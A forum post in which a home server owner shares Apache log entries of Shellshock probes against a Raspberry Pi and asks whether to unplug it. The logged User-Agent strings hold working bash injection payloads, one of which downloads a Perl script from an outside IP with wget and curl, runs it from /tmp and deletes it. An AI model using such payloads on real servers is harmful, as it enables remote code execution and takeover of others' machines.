I am starting to see Bash attack on my Raspberry Pi homeserver.
Code:
173.45.100.18___"GET /cgi-bin/hi HTTP/1.0" 404 489 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
82.221.128.246___"GET / HTTP/1.1" 200 596 "-" "() { :;}; /bin/bash -c \"wget http://82.221.105.197/bash-count.txt\""
54.251.83.67___"GET / HTTP/1.1" 200 596 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
Those are all in a row.
Other knowing these are 200 rather than 404 I don't know what to make of it.
Do I unplug the server?
EDIT:
bash-count.txt says this:
This server is used for Internet security scans.
We are collecting data purely for research purposes and do
not mean to do any harm.
If you wish to opt out and make sure that we don't scan your
IP range again, please send us an email, and we will promptly
do so.
1. Send us an email with an IP range and organization name
E-mail to
secscanoptout@gmail.com
173.45.100.18 = Columbus, Ohio
82.221.128.246 = Reykjavik, Hofuoborgarvaoio, Iceland (I have a Windows Virtual Machine running F-Prot AV ???)
54.251.83.67 = Singapore